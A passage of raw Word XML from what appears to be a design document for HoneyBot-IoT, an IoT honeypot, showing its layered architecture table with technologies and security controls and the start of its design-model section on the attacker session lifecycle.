              <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Security / Integration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C2A3E" w:rsidRPr="005A43FB" w14:paraId="62E63126" w14:textId="77777777" w:rsidTr="00020AAC">
        <w:trPr>
          <w:trHeight w:val="771"/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Device Emulator Layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Emulates a CCTV camera, a smart lock and an industrial sensor: banners, fake BusyBox file system, device commands (lockctl, sensorctl).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Python 3.12, common/fakeshell.py, common/creds.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Container isolation; no real device exposed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C2A3E" w:rsidRPr="005A43FB" w14:paraId="62E63126" w14:textId="77777777" w:rsidTr="00020AAC">
        <w:trPr>
          <w:trHeight w:val="771"/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Protocol Handling Layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SSH, Telnet, HTTP/HTTPS, MQTT 3.1.1 and RTSP servers that capture every request.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Paramiko 3.4, asyncio, FastAPI 0.110 + Uvicorn 0.29, raw sockets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Input size limits, malformed-packet handling, brute-force delay</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C2A3E" w:rsidRPr="005A43FB" w14:paraId="62E63126" w14:textId="77777777" w:rsidTr="00020AAC">
        <w:trPr>
          <w:trHeight w:val="771"/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Device State Layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">One consistent state per device shared by all protocols; telemetry simulation every 5 s.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Redis 7.2, common/state.py, device_state.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Internal network only; in-memory fallback</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C2A3E" w:rsidRPr="005A43FB" w14:paraId="62E63126" w14:textId="77777777" w:rsidTr="00020AAC">
        <w:trPr>
          <w:trHeight w:val="771"/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Attack Logging Layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Unified sessions and events with one asynchronous writer; URL and command capture; malware samples quarantined and indexed in file_captures.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">PostgreSQL 16, psycopg2 2.9.10, JSONB, GIN index</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Parameterised SQL; URLs never fetched; files stored read-only and never executed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C2A3E" w:rsidRPr="005A43FB" w14:paraId="62E63126" w14:textId="77777777" w:rsidTr="00020AAC">
        <w:trPr>
          <w:trHeight w:val="771"/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Threat Intelligence Layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sixteen time-windowed detection classes, YARA scanning, MITRE ATT&amp;CK tags, attacker correlation, GeoIP, campaigns, IOCs, STIX 2.1 export and PDF reports.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">intel/rules.py, mitre.py, correlate.py, geo.py, yara_scan.py, stix.py, report.py; yara-python 4.5, reportlab 4.2, geoip2 4.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Runs on backnet; no external API calls</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C2A3E" w:rsidRPr="005A43FB" w14:paraId="62E63126" w14:textId="77777777" w:rsidTr="00020AAC">
        <w:trPr>
          <w:trHeight w:val="771"/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Alerting Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sends Telegram and e-mail alerts above a severity threshold, with de-duplication and escalation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Telegram Bot API, smtplib (STARTTLS), PyYAML 6.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Secrets only in .env; every decision logged</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C2A3E" w:rsidRPr="005A43FB" w14:paraId="62E63126" w14:textId="77777777" w:rsidTr="00020AAC">
        <w:trPr>
          <w:trHeight w:val="771"/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">API Layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">REST endpoints for statistics, attackers, sessions, devices, detections, malware, IOCs, search and exports (CSV, STIX, PDF, ML dataset), Prometheus metrics and the /api/ws WebSocket.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">FastAPI 0.110, Uvicorn 0.29</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Not published to the host; read-only queries</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C2A3E" w:rsidRPr="005A43FB" w14:paraId="62E63126" w14:textId="77777777" w:rsidTr="00020AAC">
        <w:trPr>
          <w:trHeight w:val="771"/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Visualization Layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">React single-page SOC dashboard with eleven pages, offline world map, session replay and live WebSocket updates.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">React 19, TypeScript 5, TanStack Router and Query, Tailwind CSS 4, Recharts, d3-geo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Static files served by Nginx; strict Content-Security-Policy; no external requests</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C2A3E" w:rsidRPr="005A43FB" w14:paraId="62E63126" w14:textId="77777777" w:rsidTr="00020AAC">
        <w:trPr>
          <w:trHeight w:val="771"/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Gateway</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Serves the dashboard and proxies /api/ and /api/ws to the API.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Nginx 1.26</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">bcrypt basic auth (auth-init), rate limit 20 r/s, security headers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C2A3E" w:rsidRPr="005A43FB" w14:paraId="62E63126" w14:textId="77777777" w:rsidTr="00020AAC">
        <w:trPr>
          <w:trHeight w:val="771"/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Deployment Layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Builds and runs 13 services on four networks with health checks, automatic outbound firewall, backups and an optional monitoring profile.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Docker, Docker Compose, firewall service (iptables DOCKER-USER), backup service, Prometheus/Grafana</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">non-root, read-only, cap_drop ALL, no-new-privileges, CPU/memory limits</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7EC7BC08" w14:textId="2205920E" w:rsidR="005C6601" w:rsidRDefault="005C6601" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="9009" w:name="_Toc69009"/>
      <w:r>
        <w:t xml:space="preserve">4. Design Models</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9009"/>
    </w:p>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The design models below describe the complete system defined in the scope. Steps that belong to the AI/ML module (classification, anomaly and risk scoring) are part of the 100% milestone; at the 70% milestone the same position in the flow is taken by the rule-based Threat Intelligence Engine. Its implemented pipeline is the last model of Section 4.1, and Section 4.2 adds one activity diagram for each module workflow implemented so far.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798ED7E6" w14:textId="4AFFB33B" w:rsidR="005C6601" w:rsidRDefault="005C6601" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc229436417"/>
      <w:r>
        <w:t xml:space="preserve">4.1 Design Models for Object-Oriented Development Approach</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="4D8A89D3" w14:textId="4E8BB337" w:rsidR="003272AD" w:rsidRDefault="005C6601" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>HoneyBot-IoT is developed using Object-Oriented concept. The design model that can be applied for this approach is Activity Diagram, Class Diagram, Sequence Diagram, and State Transition Diagram. Each model is described below with only the most essential workflows and processes of the system being highlighted. Login, logout, and managing the profile are excluded since they are considered "trivial" operations, according to the standards of the template.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D63420" w14:textId="53D8B103" w:rsidR="003272AD" w:rsidRPr="005C6601" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc229436418"/>
      <w:r>
        <w:t xml:space="preserve">Activity Diagram (Attacker Session Lifecycle)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="729A9813" w14:textId="77777777" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The Activity Diagram for HoneyBot-IoT models the complete lifecycle of an attacker session, from the initial network connection through protocol emulation, session logging, AI classification, and final dashboard delivery. This workflow is the central operational process of the system and is critical to achieving objectives BO-3 (Advanced Attack Logging Infrastructure) and BO-4 (Automated Attack Classification System).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA99054" w14:textId="77777777" w:rsidR="005C6601" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25FF24FC" wp14:editId="2BB97232">
            <wp:extent cx="4752109" cy="6891375"/>
            <wp:effectExtent l="0" t="0" r="0" b="508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0405093" name="Picture 170405093"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4759620" cy="6902267"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CF3682" w14:textId="7FA23AD5" w:rsidR="003272AD" w:rsidRDefault="005C6601" w:rsidP="006238CF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">3</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
